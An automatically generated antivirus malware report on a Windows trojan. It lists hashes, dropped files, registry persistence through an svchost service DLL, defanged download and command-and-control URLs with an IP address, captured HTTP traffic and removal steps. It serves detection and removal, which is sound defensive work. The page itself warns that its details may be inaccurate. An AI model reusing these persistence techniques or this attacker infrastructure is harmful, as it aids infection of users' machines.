Trojan.Win32.FlyStudio_8a04d8230f

by malwarelabrobot on July 19th, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), Trojan:Win32/Aenjaris!rfn (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6125 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!8A04D8230FB3 (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), TROJ_GEN.R08NC0DGC17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 8a04d8230fb3539b678b4e99fbe1e23d
SHA1: 37d429c2b93aa9d6049ac074d08f2bd48b74895d
SHA256: e42cc205c362a73e9df7eb604455ef60ed484140e24cc7eb16fcd870a9203267
SSDeep: 6144:syBaOyfxYp6i6SOgR75v9kkJce8HCKAONqsplsd wa:781axHR75V/JoCKnq1 wa
Size: 341008 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:31:43
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:268

The Trojan injects its code into the following process(es):

tip.exe:2700

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (43644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (120904 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29481 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (158158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (0 bytes)

Registry activity

The process tip.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@AE19.tmp,"

The process %original file name%.exe:268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdServiceGroup" = "AdService"

[HKLM\System\CurrentControlSet\services\AdService]
"Description" = "AdService"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASAPI32]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8a04d8230fb3539b678b4e99fbe1e23d_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\AdService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
9873ea6da234c2a16383b520b71df69e c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin
9873ea6da234c2a16383b520b71df69e c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@AE19.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241907 242176 4.55871 96bec2e84a745245e52b71231fa54283
.rdata 249856 77270 77312 3.73978 8319409a73259a03b7c7bfe2241bdd43
.data 327680 9556 6144 2.75261 2521505c8394a761a047c2506594609e
.tls 339968 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 344064 488 512 3.30772 ab97e96c261ed292d805baa37d7ec5bb
.reloc 348160 12860 13312 4.49832 b1cea0df948ac05c8887e3c2b6722ff8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
hxxp://api.knsdknknndnfjenkjwwlekfj.com/api/list 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/report HTTP/1.1
Server: Jtwd9ATUckjtTtKOxNwdaO1O9uap1OR4Rt1pYtWO0UTxYAIxox8kjUVuRAVxIuLOYt8t1dWOjtWdCNWd0UVpRxgdwd9AJkIN0kKOluoOQubuYUQNb4R4KO9OCpFUU4LdpAVpVpIx8SopVxTSmOop1urdTumdEtLdFkIxgOVOTdoxaSau1u0pttWpouWdVSO4buDxbu1NbN1UwdmxKOiNgNgkCtgA1494bdIubduildVdbulN
Server-Key: xuOdSpEFUtAkN4XvnGPf3iHhqB5yZ2zsKwRb7YjC08c6DQrgLTao1VIW9MmlJe
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: BeKfb7Vmz4ZUlIJQOCgcL6a2oqTXMkE91RF0hjHdw8YDxsptPvyiW5NnGru3SA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:38 GMT



GET /api/ip HTTP/1.1

User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:50 GMT
Content-Length: 71
{"ip":"194.242.96.218","iso_code":"UA","en":"Ukraine","cn":"........."
}..


GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 26 Jun 2017 04:42:22 GMT
Accept-Ranges: bytes
ETag: "f440eb9936eed21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:38 GMT
Content-Length: 978432

GET /tip.bin HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:44 GMT
Content-Length: 304640

GET /api/list HTTP/1.1
User-Agent: restclient for cpp v1.0
Host: api.knsdknknndnfjenkjwwlekfj.com
Connection: Keep-Alive


HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 18 Jul 2017 15:55:49 GMT
Content-Length: 11
Bad Request..


The Trojan connects to the servers at the following location(s):

svchost.exe_2696:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_2700:

`.rsrc
t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)



Remove it with Ad-Aware

  1. Click here to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:268

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (43644 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (120904 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29481 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (158158 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
